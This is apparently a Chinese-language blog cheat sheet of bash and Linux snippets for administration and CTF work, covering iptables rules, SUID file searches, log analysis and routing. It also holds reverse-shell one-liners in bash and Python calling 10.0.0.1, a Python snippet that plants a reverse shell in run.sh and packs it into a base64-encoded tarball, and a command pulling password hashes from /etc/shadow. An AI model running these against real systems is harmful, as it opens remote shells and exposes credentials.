bash小代码
来源:互联网 发布:计算定积分软件 编辑:程序博客网 时间:2024/06/18 18:19
参考:
searchsploit
openkeerp-cli
youtube
gdb开启inter的flavor
$ echo "set disassembly-flavor intel" > ~/.gdbinit$ gdb ./x...(gdb) disas mainDump of assembler code for function main: 0x0000000000400637 <+0>: push rbp 0x0000000000400638 <+1>: mov rbp,rsp 0x000000000040063b <+4>: sub rsp,0x30 0x000000000040063f <+8>: mov DWORD PTR [rbp-0x24],edi 0x0000000000400642 <+11>: mov QWORD PTR [rbp-0x30],rsi 0x0000000000400646 <+15>: mov rax,QWORD PTR fs:0x28 0x000000000040064f <+24>: mov QWORD PTR [rbp-0x8],rax 0x0000000000400653 <+28>: xor eax,eax 0x0000000000400655 <+30>: mov rax,QWORD PTR [rbp-0x30] 0x0000000000400659 <+34>: add rax,0x8 0x000000000040065d <+38>: mov rdx,QWORD PTR [rax] 0x0000000000400660 <+41>: lea rax,[rbp-0x20] 0x0000000000400664 <+45>: mov rsi,rdx 0x0000000000400667 <+48>: mov rdi,rax 0x000000000040066a <+51>: call 0x4004d0 <strcpy@plt> 0x000000000040066f <+56>: lea rax,[rbp-0x20] 0x0000000000400673 <+60>: mov rsi,rax 0x0000000000400676 <+63>: mov edi,0x40072c 0x000000000040067b <+68>: mov eax,0x0 0x0000000000400680 <+73>: call 0x400500 <printf@plt> 0x0000000000400685 <+78>: mov eax,0x0 0x000000000040068a <+83>: mov rcx,QWORD PTR [rbp-0x8] 0x000000000040068e <+87>: xor rcx,QWORD PTR fs:0x28 0x0000000000400697 <+96>: je 0x40069e <main+103> 0x0000000000400699 <+98>: call 0x4004f0 <__stack_chk_fail@plt> 0x000000000040069e <+103>: leave 0x000000000040069f <+104>: retEnd of assembler dump.
Linux文件——保护禁止修改、删除、移动文件等
自动化恢复监控目录下创建的新文件和新目录
https://github.com/ssooking/CTFDefense/blob/02290457382a43d6d4daadd8e4e7e023d1d5d572/Monitor/SimpleMonitor.py
用法
pip install pynotifypython -m pynotify /tmp
Linux中查看指定进程socket连接数
ls /proc/<进程pid>/fd -l | grep socket: | wc -l
demo
cqq@kali:/tmp$ pidof sshd51070 51068 21038cqq@kali:/tmp$ sudo ls /proc/51068/fd -l | grep socket: | wc -l[sudo] password for cqq:3cqq@kali:/tmp$ sudo ls /proc/51068/fd -l | grep socket:lrwx------ 1 root root 64 Oct 10 17:45 3 -> socket:[109283]lrwx------ 1 root root 64 Oct 10 17:45 4 -> socket:[109319]lrwx------ 1 root root 64 Oct 10 17:45 6 -> socket:[109349]
禁止从客户机202.202.43.125访问202.202.43.55上的任何服务
iptables -t filter -A FORWARD -s 202.202.43.125 -d 202.202.43.55 -j DROP
丢弃陌生的TCP响应包,防止反弹式攻击
iptables -A INPUT -m state --state NEW -p tcp ! --syn -j DROPiptables -A FORWARD -m state --state NEW -p tcp --syn -j DROP
限制/允许某IP/网段SSH登录本机
iptable -t filter -A INPUT -s 202.202.43.125 -p tcp --dport 22 -j DROP //禁止从202.202.43.125远程登陆到本机iptables -A INPUT -s 202.202.43.125/24 -p tcp --dport 22 -j ACCEPT //允许202.202.43.125网段远程登陆访问ssh
限制单个IP最大连接数
#限制单个IP的最大连接数为 30iptables -I INPUT -p tcp --dport 80 -m connlimit --connlimit-above 30 -j REJECT
封某个IP或IP段
iptables -I INPUT -s . -j DROPiptables -I INPUT -s ./ -j DROP
备份/还原MySQL数据库
## 备份mysql数据库mysqldump -u 用户名 -p 密码 数据库名 > back.sql mysqldump --all-databases > bak.sql ## 还原mysql数据库mysql -u 用户名 -p 密码 数据库名 < bak.sql
找到正在系统上运行的所有SUID可执行文件
# 从/目录中查找具有SUID权限位且属主为root的文件并输出它们,然后将所有错误重定向到/dev/nullfind / -user root -perm -4000 -print 2>/dev/nullfind / -perm -u=s -type f 2>/dev/nullfind / -user root -perm -4000 -exec ls -ldb {} \;
demo
cqq@ubuntu:~$ find / -user root -perm -4000 -print 2>/dev/null/bin/umount/bin/ping/bin/su/bin/fusermount/bin/ntfs-3g/bin/ping6/bin/mount/usr/bin/vmware-user-suid-wrapper/usr/bin/passwd/usr/bin/gpasswd/usr/bin/chfn/usr/bin/sudo/usr/bin/newgrp/usr/bin/chsh/usr/lib/dbus-1.0/dbus-daemon-launch-helper/usr/lib/openssh/ssh-keysign/usr/lib/eject/dmcrypt-get-devicecqq@ubuntu:~$ find / -perm -u=s -type f 2>/dev/null/bin/umount/bin/ping/bin/su/bin/fusermount/bin/ntfs-3g/bin/ping6/bin/mount/usr/bin/vmware-user-suid-wrapper/usr/bin/passwd/usr/bin/gpasswd/usr/bin/chfn/usr/bin/sudo/usr/bin/newgrp/usr/bin/chsh/usr/lib/dbus-1.0/dbus-daemon-launch-helper/usr/lib/openssh/ssh-keysign/usr/lib/eject/dmcrypt-get-devicecqq@ubuntu:~$ find / -user root -perm -4000 -exec ls -ldb {} \; 2>/dev/null-rwsr-xr-x 1 root root 27608 Jun 14 14:51 /bin/umount-rwsr-xr-x 1 root root 44168 May 7 2014 /bin/ping-rwsr-xr-x 1 root root 40128 May 16 16:37 /bin/su-rwsr-xr-x 1 root root 30800 Jul 12 2016 /bin/fusermount-rwsr-xr-x 1 root root 142032 Jan 28 2017 /bin/ntfs-3g-rwsr-xr-x 1 root root 44680 May 7 2014 /bin/ping6-rwsr-xr-x 1 root root 40152 Jun 14 14:51 /bin/mount-rwsr-xr-x 1 root root 10624 Feb 9 2017 /usr/bin/vmware-user-suid-wrapper-rwsr-xr-x 1 root root 54256 May 16 16:37 /usr/bin/passwd-rwsr-xr-x 1 root root 75304 May 16 16:37 /usr/bin/gpasswd-rwsr-xr-x 1 root root 49584 May 16 16:37 /usr/bin/chfn-rwsr-xr-x 1 root root 136808 Jul 4 00:37 /usr/bin/sudo-rwsr-xr-x 1 root root 39904 May 16 16:37 /usr/bin/newgrp-rwsr-xr-x 1 root root 40432 May 16 16:37 /usr/bin/chsh-rwsr-xr-- 1 root messagebus 42992 Jan 12 2017 /usr/lib/dbus-1.0/dbus-daemon-launch-helper-rwsr-xr-x 1 root root 428240 Mar 16 2017 /usr/lib/openssh/ssh-keysign-rwsr-xr-x 1 root root 10232 Mar 27 2017 /usr/lib/eject/dmcrypt-get-device
vim全局替换命令
:%s/xxxx/yyyyy/g
花式反弹shell
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1######################################python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
使用SSH隧道
ssh -qTfnN -L port:host:hostport -l user remote_ip #正向隧道,监听本地portssh -qTfnN -R port:host:hostport -l user remote_ip #反向隧道,用于内网穿透防火墙限制之类ssh -qTfnN -D port remotehost #直接进行socks代理## -q 安静模式# -T 不占用shell# -f 后台执行(推荐加-n参数)# -N 不执行远程命令
递归改变某目录及其下面所有文件的属主和属组
# sudo chown -R cqq:cqq html
递归改变某目录的所有者为当前用户
# sudo chown -R $(whoami) /usr/local/share
SSH端口转发
ssh -CfNg -L port1:127.0.0.1:port2 user@host 本地转发ssh -CfNg -R port2:127.0.0.1:port1 user@hsst 远程转发
Linux中以另一个用户身份运行命令
# Linux中以另一个用户身份运行命令$ sudo -u www-data touch /var/www/html/test_www-data# -u表示以某个user的身份,这里以www-data的身份创建了/var/www/html/test_www-data这个文件
从/etc/passwd中找出所有用户
$ cat /etc/passwd |cut -d ':' -f 1
从/etc/shadow中找出用户的密码hash
$ cat /etc/shadow |cut -d ':' -f 2 |egrep '^\$.\$'
wireshark过滤用不着的协议包
not arp and not ssdp and not icmp and not nbns and not dhcpfo and not llmnr and not mdns and not icmpv6 and not igmp and not dhcpv6
添加用户,并将其加入到sudo用户组
# 添加用户,并将其加入到sudo用户组$ useradd -m cqq -G sudo -s /bin/bash# 已有用户的情况下,将其加入sudo组$ usermod -a -G sudo cqq
在已有bash脚本中添加反弹shell的脚本
f = open('run.sh', 'w')f.write('#!/bin/bash\n')f.write('/bin/bash -i >& /dev/tcp/' + args.lhost + '/' + args.lport + ' 0>&1\n')f.close()# 最后添加执行权限os.chmod('run.sh', 0777)# 添加打包文件的功能import tarfile# 打开某gz文件,加入run.sh,然后关闭tar = tarfile.open("root.tar.gz", "w:gz")tar.add("run.sh")tar.close()# 读这个tar文件,并对读到的内容进行base64加密with open("root.tar.gz", "rb") as tarfile:tar64 = base64.b64encode(tarfile.read())
运维用的脚本
来自:https://xianzhi.aliyun.com/forum/read/2150.html
过滤Content-Length大于5M的日志
awk '{if($10>5000000){print $0}}' /var/log/httpd/access_log
重点关注POST请求
grep 'POST' /var/log/httpd/access_log | awk '{print $1}' | sort | uniq -c | sort -nr
查看ssh登录成功/失败的信息
grep 'Accepted' /var/log/secure | awk '{print $11}' | sort | uniq -c | sort -nr
或者last命令,它会读取位于/var/log/wtmp
的文件,并把该文件记录的登录系统的用户名单,全部显示出来。
grep 'Failed' /var/log/secure | awk '{print $11}' | sort | uniq -c | sort -nr
或者lastb命令,会读取位于/var/log/btmp
的文件,并把该文件记录的登入系统失败的用户名单,全部显示出来。
捕获终端信号
function control_c(){ service xxx stop echo -en "xxx has been stopped!" exit $?}# capture SIGINT(Ctrl + C) and exit the script cleantrap control_c SIGINT
判断当前用户是否是root
if [ "0" != "$UID" ] ; then echo "需要 root 权限" exit 1fi
判断是否存在某目录
if [ ! -d $CONFIG_PATH ] ; then echo "首次使用,调用ok-config命令进行配置,若配置错误将无法登录" ok-configfi
判断字符串的长度是否为0
为0,则为true
if [ -z $config_file ]; then config_file="default"fi
不为0,则为true
if [ -n "$ppp_ip" ] ; then echo "登录成功!"
判断字符串的后缀
if [ "cqupt" == "$(echo $OK_USER | awk -F '@' '{print $2}')" ] ; then
得到eth0网卡的默认网关
gateway_ip=`ip r | awk '/default via/&&/dev 'eth0'/{print $3}'`
输出ifconfig输出中的ip信息
root@snort-ids:/home/cqq/repos# ip a show dev eth0 | awk '/inet [12]/' inet 172.18.124.136/22 brd 172.18.127.255 scope global eth0# 输出匹配行的第二列root@snort-ids:/home/cqq/repos# ip a show dev eth0 | awk '/inet [12]/{print $2}'172.18.124.136/22
删除默认路由
ip route del 172.0.0.0/8 > /dev/null 2>&1ip route del 202.202.0.0/16 > /dev/null 2>&1
添加内网路由
$OK_ETH = 'eth0'ip route add 172.16.0.0/12 dev $OK_ETH via $gateway_ip metric $OK_METRIC table $OK_RTTABLE> /dev/null 2>&1ip route add 172.32.0.0/16 dev $OK_ETH via $gateway_ip metric $OK_METRIC table $OK_RTTABLE> /dev/null 2>&1ip route add 172.33.0.0/16 dev $OK_ETH via $gateway_ip metric $OK_METRIC table $OK_RTTABLE> /dev/null 2>&1ip route add 172.34.0.0/16 dev $OK_ETH via $gateway_ip metric $OK_METRIC table $OK_RTTABLE> /dev/null 2>&1ip route add 202.202.32.0/20 dev $OK_ETH via $gateway_ip metric $OK_METRIC table $OK_RTTABLE> /dev/null 2>&1ip route add 202.202.43.0/24 dev $OK_ETH via $gateway_ip metric $OK_METRIC table $OK_RTTABLE> /dev/null 2>&1ip route add 202.202.45.0/24 dev $OK_ETH via $gateway_ip metric $OK_METRIC table $OK_RTTABLE> /dev/null 2>&1ip route add 222.177.140.0/24 dev $OK_ETH via $gateway_ip metric $OK_METRIC table $OK_RTTABLE> /dev/null 2>&1
progname="$( basename "$0" )"...## Usage infofunction usage(){ echo " Usage: ${progname} [options] term1 [term2] ... [termN]" echo echo "==========" echo " Examples " echo "==========" echo " ${progname} afd windows local" echo " ${progname} -t oracle windows" echo " ${progname} -p 39446" echo echo " For more examples, see the manual: https://www.exploit-db.com/searchsploit/" echo echo "=========" echo " Options " echo "=========" echo " -c, --case [Term] Perform a case-sensitive search (Default is inSEnsITiVe)." echo " -e, --exact [Term] Perform an EXACT match on exploit title (Default is AND) [Implies \"-t\"]." echo " -h, --help Show this help screen." echo " -j, --json [Term] Show result in JSON format." echo " -m, --mirror [EDB-ID] Mirror (aka copies) an exploit to the current working directory." echo " -o, --overflow [Term] Exploit titles are allowed to overflow their columns." echo " -p, --path [EDB-ID] Show the full path to an exploit (and also copies the path to the clipboard if possible)." echo " -t, --title [Term] Search JUST the exploit title (Default is title AND the file's path)." echo " -u, --update Check for and install any exploitdb package updates (deb or git)." echo " -w, --www [Term] Show URLs to Exploit-DB.com rather than the local path." echo " -x, --examine [EDB-ID] Examine (aka opens) the exploit using \$PAGER." echo " --colour Disable colour highlighting in search results." echo " --id Display the EDB-ID value rather than local path." echo " --nmap [file.xml] Checks all results in Nmap's XML output with service version (e.g.: nmap -sV -oX file.xml)." echo " Use \"-v\" (verbose) to try even more combinations" echo "=======" echo " Notes " echo "=======" echo " * You can use any number of search terms." echo " * Search terms are not case-sensitive (by default), and ordering is irrelevant." echo " * Use '-c' if you wish to reduce results by case-sensitive searching." echo " * And/Or '-e' if you wish to filter results by using an exact match." echo " * Use '-t' to exclude the file's path to filter the search results." echo " * Remove false positives (especially when searching using numbers - i.e. versions)." echo " * When updating from git or displaying help, search terms will be ignored." echo "" exit 2}
阅读全文
0 0
- bash小代码
- bash小技巧
- bash shell小技巧
- Bash小练习备份
- Bash小技巧
- bash 小技巧
- bash小方便
- bash使用小技巧
- bash 小秘笈
- bash 小秘笈
- bash 小秘笈
- bash 小秘笈
- 几个bash代码
- BASH代码Refine实例
- [bash]: 删除代码注释
- bash 常用代码片段
- bash 的一些小 tips
- 十个Linux bash小技巧
- 利用ScrollView实现图片缩放
- 编译dll时debug和release版命名不同遇到的问题
- mongo脚本文件
- Sqlite 安装&基本操作
- Spark集群完全分布式安装部署
- bash小代码
- SAPI SDK的介绍
- AES 原理
- ICMP Flood 攻击、UDP Flood 攻击、SYN Flood 攻击
- glide加载图片的时候不能正常显示,时大时小.
- [leetcode: Python]15.3Sum
- Java密码加密
- [YTU]_2444( C++习题 对象转换)
- Web基础加强